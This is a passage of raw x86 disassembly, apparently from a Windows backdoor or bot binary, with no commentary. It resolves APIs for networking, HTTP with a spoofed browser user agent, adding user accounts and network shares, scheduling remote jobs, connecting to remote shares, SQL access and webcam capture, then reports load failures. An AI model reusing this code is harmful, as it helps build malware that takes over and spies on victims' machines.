push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov dword_4916A0, eax
call esi ; GetProcAddress
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov dword_4916A8, eax
call esi ; GetProcAddress
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov dword_491664, eax
call esi ; GetProcAddress
push offset aSelectobject ; "SelectObject"
push edi
mov dword_49158C, eax
call esi ; GetProcAddress
push offset aBitblt ; "BitBlt"
push edi
mov dword_491538, eax
call esi ; GetProcAddress
push offset aDeletedc ; "DeleteDC"
push edi
mov dword_4916A4, eax
call esi ; GetProcAddress
push offset aDeleteobject ; "DeleteObject"
push edi
mov dword_491524, eax
call esi ; GetProcAddress
cmp dword_491648, ebx
mov dword_4915C0, eax
jz short loc_40EA83
cmp dword_4916A0, ebx
jz short loc_40EA83
cmp dword_4916A8, ebx
jz short loc_40EA83
cmp dword_491664, ebx
jz short loc_40EA83
cmp dword_49158C, ebx
jz short loc_40EA83
cmp dword_491538, ebx
jz short loc_40EA83
cmp dword_4916A4, ebx
jz short loc_40EA83
cmp dword_491524, ebx
jz short loc_40EA83
cmp eax, ebx
jnz short loc_40EA8D
jmp short loc_40EA83
; ---------------------------------------------------------------------------
loc_40EA78: ; CODE XREF: sub_40E59D+41A�j
call ds:dword_495328 ; RtlGetLastWin32Error
mov dword_491738, eax
loc_40EA83: ; CODE XREF: sub_40E59D+49B�j
; sub_40E59D+4A3�j ...
mov dword_491734, 1
loc_40EA8D: ; CODE XREF: sub_40E59D+4D7�j
mov ebp, ds:dword_4953C0
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40ED49
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; GetProcAddress
push offset aWsasocketa ; "WSASocketA"
push edi
mov dword_4915D4, eax
call esi ; GetProcAddress
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov dword_491700, eax
call esi ; GetProcAddress
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov dword_491578, eax
call esi ; GetProcAddress
push offset aWsaioctl ; "WSAIoctl"
push edi
mov dword_491554, eax
call esi ; GetProcAddress
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov dword_491608, eax
call esi ; GetProcAddress
push offset aWsacleanup ; "WSACleanup"
push edi
mov dword_4915F0, eax
call esi ; GetProcAddress
push offset aSocket ; "socket"
push edi
mov dword_4915BC, eax
call esi ; GetProcAddress
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov dword_4916DC, eax
call esi ; GetProcAddress
push offset aConnect ; "connect"
push edi
mov dword_4916F8, eax
call esi ; GetProcAddress
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov dword_491604, eax
call esi ; GetProcAddress
push offset aInet_addr ; "inet_addr"
push edi
mov dword_4916E8, eax
call esi ; GetProcAddress
push offset aHtons ; "htons"
push edi
mov dword_49169C, eax
call esi ; GetProcAddress
push offset aHtonl ; "htonl"
push edi
mov dword_49165C, eax
call esi ; GetProcAddress
push offset aNtohs ; "ntohs"
push edi
mov dword_491658, eax
call esi ; GetProcAddress
push offset aNtohl ; "ntohl"
push edi
mov dword_491598, eax
call esi ; GetProcAddress
push offset aSend ; "send"
push edi
mov dword_491590, eax
call esi ; GetProcAddress
push offset aSendto ; "sendto"
push edi
mov dword_4916AC, eax
call esi ; GetProcAddress
push offset aRecv ; "recv"
push edi
mov dword_4916C0, eax
call esi ; GetProcAddress
push offset aRecvfrom ; "recvfrom"
push edi
mov dword_491674, eax
call esi ; GetProcAddress
mov dword_491634, eax
push offset aBind ; "bind"
push edi
call esi ; GetProcAddress
push offset aSelect ; "select"
push edi
mov dword_491688, eax
call esi ; GetProcAddress
push offset aListen ; "listen"
push edi
mov dword_491644, eax
call esi ; GetProcAddress
push offset aAccept ; "accept"
push edi
mov dword_491684, eax
call esi ; GetProcAddress
push offset aSetsockopt ; "setsockopt"
push edi
mov dword_4916F0, eax
call esi ; GetProcAddress
push offset aGetsockname ; "getsockname"
push edi
mov dword_49163C, eax
call esi ; GetProcAddress
push offset aGethostname ; "gethostname"
push edi
mov dword_491600, eax
call esi ; GetProcAddress
push offset aGethostbyname ; "gethostbyname"
push edi
mov dword_491670, eax
call esi ; GetProcAddress
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov dword_4916E0, eax
call esi ; GetProcAddress
push offset aGetpeername ; "getpeername"
push edi
mov dword_491614, eax
call esi ; GetProcAddress
push offset aClosesocket ; "closesocket"
push edi
mov dword_4915B8, eax
call esi ; GetProcAddress
cmp dword_4915D4, ebx
mov dword_4916F4, eax
jz loc_40ED54
cmp dword_491700, ebx
jz loc_40ED54
cmp dword_491578, ebx
jz loc_40ED54
cmp dword_491608, ebx
jz loc_40ED54
cmp dword_4915F0, ebx
jz loc_40ED54
cmp dword_4915BC, ebx
jz loc_40ED54
cmp dword_4916DC, ebx
jz loc_40ED54
cmp dword_4916F8, ebx
jz loc_40ED54
cmp dword_491604, ebx
jz loc_40ED54
cmp dword_4916E8, ebx
jz loc_40ED54
cmp dword_49169C, ebx
jz loc_40ED54
cmp dword_49165C, ebx
jz loc_40ED54
cmp dword_491658, ebx
jz loc_40ED54
cmp dword_491598, ebx
jz short loc_40ED54
cmp dword_4916AC, ebx
jz short loc_40ED54
cmp dword_4916C0, ebx
jz short loc_40ED54
cmp dword_491674, ebx
jz short loc_40ED54
cmp dword_491634, ebx
jz short loc_40ED54
cmp dword_491688, ebx
jz short loc_40ED54
cmp dword_491644, ebx
jz short loc_40ED54
cmp dword_491684, ebx
jz short loc_40ED54
cmp dword_4916F0, ebx
jz short loc_40ED54
cmp dword_49163C, ebx
jz short loc_40ED54
cmp dword_491600, ebx
jz short loc_40ED54
cmp dword_491670, ebx
jz short loc_40ED54
cmp dword_4916E0, ebx
jz short loc_40ED54
cmp dword_491614, ebx
jz short loc_40ED54
cmp eax, ebx
jnz short loc_40ED5E
jmp short loc_40ED54
; ---------------------------------------------------------------------------
loc_40ED49: ; CODE XREF: sub_40E59D+501�j
call ds:dword_495328 ; RtlGetLastWin32Error
mov dword_491740, eax
loc_40ED54: ; CODE XREF: sub_40E59D+6A0�j
; sub_40E59D+6AC�j ...
mov dword_49173C, 1
loc_40ED5E: ; CODE XREF: sub_40E59D+7A8�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40EE63
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; GetProcAddress
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov dword_4915A0, eax
call esi ; GetProcAddress
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov dword_49152C, eax
call esi ; GetProcAddress
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov dword_491624, eax
call esi ; GetProcAddress
push offset aInternetconnec ; "InternetConnectA"
push edi
mov dword_4915D8, eax
call esi ; GetProcAddress
push offset aInternetopena ; "InternetOpenA"
push edi
mov dword_491630, eax
call esi ; GetProcAddress
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov dword_4915F4, eax
call esi ; GetProcAddress
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov dword_49156C, eax
call esi ; GetProcAddress
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov dword_491564, eax
call esi ; GetProcAddress
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov dword_491574, eax
call esi ; GetProcAddress
cmp dword_4915A0, ebx
mov ecx, dword_4915F4
mov dword_491690, eax
jz short loc_40EE3F
cmp dword_49152C, ebx
jz short loc_40EE3F
cmp dword_491624, ebx
jz short loc_40EE3F
cmp dword_4915D8, ebx
jz short loc_40EE3F
cmp dword_491630, ebx
jz short loc_40EE3F
cmp ecx, ebx
jz short loc_40EE3F
cmp dword_49156C, ebx
jz short loc_40EE3F
cmp dword_491564, ebx
jz short loc_40EE3F
cmp dword_491574, ebx
jz short loc_40EE3F
cmp eax, ebx
jnz short loc_40EE49
loc_40EE3F: ; CODE XREF: sub_40E59D+860�j
; sub_40E59D+868�j ...
mov dword_491744, 1
loc_40EE49: ; CODE XREF: sub_40E59D+8A0�j
cmp ecx, ebx
jz short loc_40EE7E
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx ; InternetOpenA
cmp eax, ebx
mov dword_49160C, eax
jnz short loc_40EE7E
jmp short loc_40EE78
; ---------------------------------------------------------------------------
loc_40EE63: ; CODE XREF: sub_40E59D+7CC�j
call ds:dword_495328 ; RtlGetLastWin32Error
mov dword_491748, eax
mov dword_491744, 1
loc_40EE78: ; CODE XREF: sub_40E59D+8C4�j
mov dword_49160C, ebx
loc_40EE7E: ; CODE XREF: sub_40E59D+8AE�j
; sub_40E59D+8C2�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40EEC8
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; GetProcAddress
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov dword_4915E8, eax
call esi ; GetProcAddress
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov dword_491714, eax
call esi ; GetProcAddress
cmp dword_4915E8, ebx
mov dword_491580, eax
jz short loc_40EED3
cmp dword_491714, ebx
jz short loc_40EED3
cmp eax, ebx
jnz short loc_40EEDD
jmp short loc_40EED3
; ---------------------------------------------------------------------------
loc_40EEC8: ; CODE XREF: sub_40E59D+8EC�j
call ds:dword_495328 ; RtlGetLastWin32Error
mov dword_491750, eax
loc_40EED3: ; CODE XREF: sub_40E59D+91B�j
; sub_40E59D+923�j ...
mov dword_49174C, 1
loc_40EEDD: ; CODE XREF: sub_40E59D+927�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40EFD3
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; GetProcAddress
push offset aNetsharedel ; "NetShareDel"
push edi
mov dword_49155C, eax
call esi ; GetProcAddress
push offset aNetshareenum ; "NetShareEnum"
push edi
mov dword_491534, eax
call esi ; GetProcAddress
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov dword_4915A8, eax
call esi ; GetProcAddress
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov dword_4915DC, eax
call esi ; GetProcAddress
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov dword_4916EC, eax
call esi ; GetProcAddress
push offset aNetuseradd ; "NetUserAdd"
push edi
mov dword_491594, eax
call esi ; GetProcAddress
push offset aNetuserdel ; "NetUserDel"
push edi
mov dword_491540, eax
call esi ; GetProcAddress
push offset aNetuserenum ; "NetUserEnum"
push edi
mov dword_491530, eax
call esi ; GetProcAddress
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov dword_4915C4, eax
call esi ; GetProcAddress
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov dword_4916B4, eax
call esi ; GetProcAddress
cmp dword_49155C, ebx
mov dword_49166C, eax
jz short loc_40EFDE
cmp dword_491534, ebx
jz short loc_40EFDE
cmp dword_4915A8, ebx
jz short loc_40EFDE
cmp dword_4915DC, ebx
jz short loc_40EFDE
cmp dword_4916EC, ebx
jz short loc_40EFDE
cmp dword_491594, ebx
jz short loc_40EFDE
cmp dword_491540, ebx
jz short loc_40EFDE
cmp dword_491530, ebx
jz short loc_40EFDE
cmp dword_4915C4, ebx
jz short loc_40EFDE
cmp dword_4916B4, ebx
jz short loc_40EFDE
cmp eax, ebx
jnz short loc_40EFE8
jmp short loc_40EFDE
; ---------------------------------------------------------------------------
loc_40EFD3: ; CODE XREF: sub_40E59D+94B�j
call ds:dword_495328 ; RtlGetLastWin32Error
mov dword_491758, eax
loc_40EFDE: ; CODE XREF: sub_40E59D+9E6�j
; sub_40E59D+9EE�j ...
mov dword_491754, 1
loc_40EFE8: ; CODE XREF: sub_40E59D+A32�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40F01D
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; GetProcAddress
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov dword_491584, eax
call esi ; GetProcAddress
cmp dword_491584, ebx
mov dword_491654, eax
jz short loc_40F028
cmp eax, ebx
jnz short loc_40F032
jmp short loc_40F028
; ---------------------------------------------------------------------------
loc_40F01D: ; CODE XREF: sub_40E59D+A56�j
call ds:dword_495328 ; RtlGetLastWin32Error
mov dword_491760, eax
loc_40F028: ; CODE XREF: sub_40E59D+A78�j
; sub_40E59D+A7E�j
mov dword_49175C, 1
loc_40F032: ; CODE XREF: sub_40E59D+A7C�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40F067
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; GetProcAddress
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov dword_4916D8, eax
call esi ; GetProcAddress
cmp dword_4916D8, ebx
mov dword_4916D4, eax
jz short loc_40F072
cmp eax, ebx
jnz short loc_40F07C
jmp short loc_40F072
; ---------------------------------------------------------------------------
loc_40F067: ; CODE XREF: sub_40E59D+AA0�j
call ds:dword_495328 ; RtlGetLastWin32Error
mov dword_491768, eax
loc_40F072: ; CODE XREF: sub_40E59D+AC2�j
; sub_40E59D+AC8�j
mov dword_491764, 1
loc_40F07C: ; CODE XREF: sub_40E59D+AC6�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40F0DB
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; GetProcAddress
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov dword_491704, eax
call esi ; GetProcAddress
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov dword_4916FC, eax
call esi ; GetProcAddress
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov dword_4916C4, eax
call esi ; GetProcAddress
cmp dword_491704, ebx
mov dword_49159C, eax
jz short loc_40F0E6
cmp dword_4916FC, ebx
jz short loc_40F0E6
cmp dword_4916C4, ebx
jz short loc_40F0E6
cmp eax, ebx
jnz short loc_40F0F0
jmp short loc_40F0E6
; ---------------------------------------------------------------------------
loc_40F0DB: ; CODE XREF: sub_40E59D+AEA�j
call ds:dword_495328 ; RtlGetLastWin32Error
mov dword_491770, eax
loc_40F0E6: ; CODE XREF: sub_40E59D+B26�j
; sub_40E59D+B2E�j ...
mov dword_49176C, 1
loc_40F0F0: ; CODE XREF: sub_40E59D+B3A�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40F125
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; GetProcAddress
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov dword_4915D0, eax
call esi ; GetProcAddress
cmp dword_4915D0, ebx
mov dword_4916D0, eax
jz short loc_40F130
cmp eax, ebx
jnz short loc_40F13A
jmp short loc_40F130
; ---------------------------------------------------------------------------
loc_40F125: ; CODE XREF: sub_40E59D+B5E�j
call ds:dword_495328 ; RtlGetLastWin32Error
mov dword_491778, eax
loc_40F130: ; CODE XREF: sub_40E59D+B80�j
; sub_40E59D+B86�j
mov dword_491774, 1
loc_40F13A: ; CODE XREF: sub_40E59D+B84�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40F1C3
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; GetProcAddress
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov dword_491698, eax
call esi ; GetProcAddress
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov dword_4916E4, eax
call esi ; GetProcAddress
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov dword_491620, eax
call esi ; GetProcAddress
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov dword_4915E0, eax
call esi ; GetProcAddress
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov dword_491678, eax
call esi ; GetProcAddress
cmp dword_491698, ebx
mov dword_4915EC, eax
jz short loc_40F1CE
cmp dword_4916E4, ebx
jz short loc_40F1CE
cmp dword_491620, ebx
jz short loc_40F1CE
cmp dword_4915E0, ebx
jz short loc_40F1CE
cmp dword_491678, ebx
jz short loc_40F1CE
cmp eax, ebx
jnz short loc_40F1D8
jmp short loc_40F1CE
; ---------------------------------------------------------------------------
loc_40F1C3: ; CODE XREF: sub_40E59D+BA8�j
call ds:dword_495328 ; RtlGetLastWin32Error
mov dword_491780, eax
loc_40F1CE: ; CODE XREF: sub_40E59D+BFE�j
; sub_40E59D+C06�j ...
mov dword_49177C, 1
loc_40F1D8: ; CODE XREF: sub_40E59D+C22�j
push offset aAvicap32_dll ; "avicap32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40F20D
push offset aCapcreatecaptu ; "capCreateCaptureWindowA"
push edi
call esi ; GetProcAddress
push offset aCapgetdriverde ; "capGetDriverDescriptionA"
push edi
mov dword_4915B4, eax
call esi ; GetProcAddress
cmp dword_4915B4, ebx
mov dword_49168C, eax
jz short loc_40F218
cmp eax, ebx
jnz short loc_40F222
jmp short loc_40F218
; ---------------------------------------------------------------------------
loc_40F20D: ; CODE XREF: sub_40E59D+C46�j
call ds:dword_495328 ; RtlGetLastWin32Error
mov dword_491788, eax
loc_40F218: ; CODE XREF: sub_40E59D+C68�j
; sub_40E59D+C6E�j
mov dword_491784, 1
loc_40F222: ; CODE XREF: sub_40E59D+C6C�j
push 1
pop eax
pop edi
pop esi
pop ebp
pop ebx
retn
sub_40E59D endp
; ---------------------------------------------------------------------------
db 323h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F54D proc near ; CODE XREF: sub_4010DC�j
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_4]
push esi
xor esi, esi
cmp dword_49171C, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_40F595
push dword_491720
lea eax, [ebp+var_200]
push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>"
push eax
call sub_416821
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_4010D2
add esp, 20h
loc_40F595: ; CODE XREF: sub_40F54D+1A�j
cmp dword_491724, esi
jz short loc_40F5C9
push dword_491728
lea eax, [ebp+var_200]
push offset aUser32_dllFail ; "User32.dll failed. <%d>"
push eax
call sub_416821
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_4010D2
add esp, 20h
loc_40F5C9: ; CODE XREF: sub_40F54D+4E�j
cmp dword_49172C, esi
jz short loc_40F5FD
push dword_491730
lea eax, [ebp+var_200]
push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>"
push eax
call sub_416821
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_4010D2
add esp, 20h
loc_40F5FD: ; CODE XREF: sub_40F54D+82�j
cmp dword_491734, esi
jz short loc_40F631
push dword_491738
lea eax, [ebp+var_200]
push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>"
push eax
call sub_416821
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_4010D2
add esp, 20h
loc_40F631: ; CODE XREF: sub_40F54D+B6�j
cmp dword_49173C, esi
jz short loc_40F665
push dword_491740
lea eax, [ebp+var_200]
push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>"
push eax
call sub_416821
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_4010D2
add esp, 20h
loc_40F665: ; CODE XREF: sub_40F54D+EA�j
cmp dword_491744, esi
jz short loc_40F699
push dword_491748
lea eax, [ebp+var_200]
push offset aWininet_dllFai ; "Wininet.dll failed. <%d>"
push eax
call sub_416821
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_4010D2
add esp, 20h
loc_40F699: ; CODE XREF: sub_40F54D+11E�j
cmp dword_49174C, esi
jz short loc_40F6CD
push dword_491750
lea eax, [ebp+var_200]
push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>"
push eax
call sub_416821
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_4010D2
add esp, 20h
loc_40F6CD: ; CODE XREF: sub_40F54D+152�j
cmp dword_491754, esi
jz short loc_40F701
push dword_491758
lea eax, [ebp+var_200]
push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>"
push eax
call sub_416821
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_4010D2
add esp, 20h
loc_40F701: ; CODE XREF: sub_40F54D+186�j
cmp dword_49175C, esi
jz short loc_40F735
push dword_491760
lea eax, [ebp+var_200]
push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>"
push eax
call sub_416821
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_4010D2
add esp, 20h
loc_40F735: ; CODE XREF: sub_40F54D+1BA�j
cmp dword_491764, esi
jz short loc_40F769
push dword_491768
lea eax, [ebp+var_200]
push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>"
push eax
call sub_416821
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_4010D2
add esp, 20h
loc_40F769: ; CODE XREF: sub_40F54D+1EE�j
cmp dword_49176C, esi
jz short loc_40F79D
push dword_491770
lea eax, [ebp+var_200]
push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>"
push eax
call sub_416821
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_4010D2
add esp, 20h
loc_40F79D: ; CODE XREF: sub_40F54D+222�j
cmp dword_491774, esi
jz short loc_40F7D1
push dword_491778
lea eax, [ebp+var_200]
push offset aShell32_dllFai ; "Shell32.dll failed. <%d>"
push eax
call sub_416821
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_4010D2
add esp, 20h
loc_40F7D1: ; CODE XREF: sub_40F54D+256�j
cmp dword_49177C, esi
jz short loc_40F805
push dword_491780
lea eax, [ebp+var_200]
push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>"
push eax
call sub_416821
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_4010D2
add esp, 20h
loc_40F805: ; CODE XREF: sub_40F54D+28A�j
cmp dword_491784, esi
jz short loc_40F839
push dword_491788
lea eax, [ebp+var_200]
push offset aAvicap32_dllFa ; "Avicap32.dll failed. <%d>"
push eax
call sub_416821
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_4010D2
add esp, 20h
loc_40F839: ; CODE XREF: sub_40F54D+2BE�j
lea eax, [ebp+var_200]
push offset unk_4303AC
push eax
call sub_416821
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_40F866
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_4010D2
add esp, 14h
loc_40F866: ; CODE XREF: sub_40F54D+302�j
lea eax, [ebp+var_200]
push eax
call sub_401014
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40F54D endp
; ---------------------------------------------------------------------------
db 0CAh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F942 proc near ; CODE XREF: sub_40113B�j
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz short loc_40F9CD
mov eax, [ebp+arg_4]
cmp eax, esi
jz short loc_40F9CD
cmp [ebp+arg_8], esi
jz short loc_40F9CD
cmp byte ptr [eax], 0
jz short loc_40F9CD
push ebx
push edi
call sub_421042
mov ebx, eax
pop ecx
test ebx, ebx
jz short loc_40F9C8
push [ebp+arg_4]
push edi
call sub_417760
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_40F9C1
sub eax, edi
push eax
push edi
push ebx
call sub_416A10
push [ebp+arg_8]
mov eax, ebx
sub eax, edi
and byte ptr [eax+esi], 0
call sub_4158E0
push eax
push [ebp+arg_8]
push ebx
call sub_4168B0
push [ebp+arg_4]
call sub_4158E0
add eax, esi
push eax
push ebx
call sub_4175E0
push ebx
push edi
call sub_4175D0
add esp, 30h
mov esi, edi
loc_40F9C1: ; CODE XREF: sub_40F942+3C�j
push ebx
call sub_415D6C
pop ecx
loc_40F9C8: ; CODE XREF: sub_40F942+2B�j
mov eax, esi
pop ebx
jmp short loc_40F9CF
; ---------------------------------------------------------------------------
loc_40F9CD: ; CODE XREF: sub_40F942+C�j
; sub_40F942+13�j ...
xor eax, eax
loc_40F9CF: ; CODE XREF: sub_40F942+89�j
pop edi
pop esi
pop ebp
retn
sub_40F942 endp
; ---------------------------------------------------------------------------
db 24h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F9F7 proc near ; CODE XREF: sub_4010D7�j
var_7D0 = dword ptr -7D0h
var_7CC = byte ptr -7CCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push 7D0h
lea eax, [ebp+var_7D0]
push 0
push eax
call sub_415CA0
mov esi, [ebp+arg_0]
push esi
call sub_4158E0
add esp, 10h
push 1
pop ebx
cmp eax, ebx
jge short loc_40FA2D
or eax, 0FFFFFFFFh
jmp short loc_40FAA0
; ---------------------------------------------------------------------------
loc_40FA2D: ; CODE XREF: sub_40F9F7+2F�j
xor ecx, ecx
mov [ebp+var_7D0], esi
test eax, eax
jle short loc_40FA4F
loc_40FA39: ; CODE XREF: sub_40F9F7+56�j
mov dl, [ecx+esi]
cmp dl, 0Ah
jz short loc_40FA46
cmp dl, 0Dh
jnz short loc_40FA4A
loc_40FA46: ; CODE XREF: sub_40F9F7+48�j
and byte ptr [ecx+esi], 0
loc_40FA4A: ; CODE XREF: sub_40F9F7+4D�j
inc ecx
cmp ecx, eax
jl short loc_40FA39
loc_40FA4F: ; CODE XREF: sub_40F9F7+40�j
xor edx, edx
push edi
test eax, eax
jle short loc_40FA80
lea edi, [ebp+var_7CC]
loc_40FA5C: ; CODE XREF: sub_40F9F7+87�j
cmp byte ptr [edx+esi], 0
jnz short loc_40FA7B
cmp byte ptr [edx+esi+1], 0
lea ecx, [edx+esi+1]
jz short loc_40FA7B
cmp ebx, 1F4h
jge short loc_40FA80
mov [edi], ecx
inc ebx
add edi, 4
loc_40FA7B: ; CODE XREF: sub_40F9F7+69�j
; sub_40F9F7+74�j
inc edx
cmp edx, eax
jl short loc_40FA5C
loc_40FA80: ; CODE XREF: sub_40F9F7+5D�j
; sub_40F9F7+7C�j
cmp [ebp+arg_4], 0
pop edi
jz short loc_40FA9E
lea eax, [ebp+var_7D0]
push 7D0h
push eax
push [ebp+arg_4]
call sub_415960
add esp, 0Ch
loc_40FA9E: ; CODE XREF: sub_40F9F7+8E�j
mov eax, ebx
loc_40FAA0: ; CODE XREF: sub_40F9F7+34�j
pop esi
pop ebx
leave
retn
sub_40F9F7 endp
; ---------------------------------------------------------------------------
db 2Bh dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40FACF proc near ; CODE XREF: sub_40122B�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
xor esi, esi
rep stosd
lea edi, [eax-1]
test edi, edi
jl short loc_40FB08
push ebx
mov ebx, edi
loc_40FAEC: ; CODE XREF: sub_40FACF+36�j
mov eax, [esp+0Ch+arg_0]
mov al, [esi+eax]
push eax
call sub_401131
pop ecx
inc esi
mov ecx, [esp+0Ch+arg_8]
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_40FAEC
pop ebx
loc_40FB08: ; CODE XREF: sub_40FACF+18�j
pop edi
pop esi
retn
sub_40FACF endp
; ---------------------------------------------------------------------------
db 0Fh dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40FB1A proc near ; CODE XREF: sub_401131�j
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax
call sub_417C24
cmp al, 61h
pop ecx
jl short loc_40FB35
cmp al, 7Ah
jg short loc_40FB35
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_40FB35: ; CODE XREF: sub_40FB1A+E�j
; sub_40FB1A+12�j
xor eax, eax
retn
sub_40FB1A endp
; ---------------------------------------------------------------------------
db 7 dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FB3F proc near ; CODE XREF: sub_40121C�j
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_416880
push ebx
push esi
push edi
